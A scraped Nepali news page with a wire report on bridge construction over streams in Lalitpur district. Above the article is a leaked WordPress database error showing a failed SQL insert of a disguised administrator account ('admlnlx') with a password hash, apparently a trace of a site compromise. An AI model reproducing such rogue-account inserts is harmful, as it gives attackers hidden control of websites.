WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtA3QFEoPKWNIMiLLyX/CSJLHEHfeT.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 15:34:58', '', 'admlnlx', 'admlnlx')
ललितपुर, मंसिर २९ –
वर्षाको समयमा समेत यातायातका साधन नियमित चल्न सक्ने गरी जिल्लाका विभिन्न स्थानका खोलामा मोटर चल्ने पुल निर्माण धमाधम अघि बढेको छ ।
यो आर्थिक वर्षमा सम्पन्न हुने गरेर टुङ्गुन खोला र कोड्कु खोलामा पुल निर्माणको काम भइरहेको छ । इकुडोल गाविसमा रहेको टुङ्गुन खोला पुलले आसपासका गाविसका बासिन्दासमेत लाभान्वित हुन सक्ने जिल्ला प्राविधिक कार्यालयले बताएको छ ।
कार्यरत सब–इन्जिनियर किशोर मोक्तानले उपभोक्ता समितिले पुल निर्माणको काम गरिरहेको बताउनुभयो । उहाँले भन्नुभयो, “यी पुल बनेपछि हिउँदमा जसरी वर्षामा पनि यातायातका साधन चलेर स्थानीयवासीको जीवन सहज हुन सक्नेछ ।”
केही समयपहिले मात्रै दलचोकी गाविसमा ठोस्ने खोलामा मोटर चल्ने पुल निर्माणको काम सकिएको थियो । गत वर्ष ललितपुरका दक्षिणी भेगका धेरै गाविस जोड्ने खानीखोला पुल निर्माण सकिएको हो । आगामी आवमा पनि पुल निर्माणको कामले निरन्तरता पाउने जिविसका योजना अधिकृत रामचन्द्र लामगादेले बताउनुभयो ।
जिविसको पूर्वयोजना तर्जुमा बैठकले ग्रामीण क्षेत्रमा सडकसँगै विभिन्न स्थान जोड्ने पुल निर्माणको निर्णय गरेको छ । उहाँ भन्नुहुन्छ, “आगामी वर्ष ललितपुरकै एकभन्दा बढी गाविस जोड्ने वा जिल्लालाई अरू जिल्लासँग जोड्ने पुलका योजना बन्नेछन् । – रासस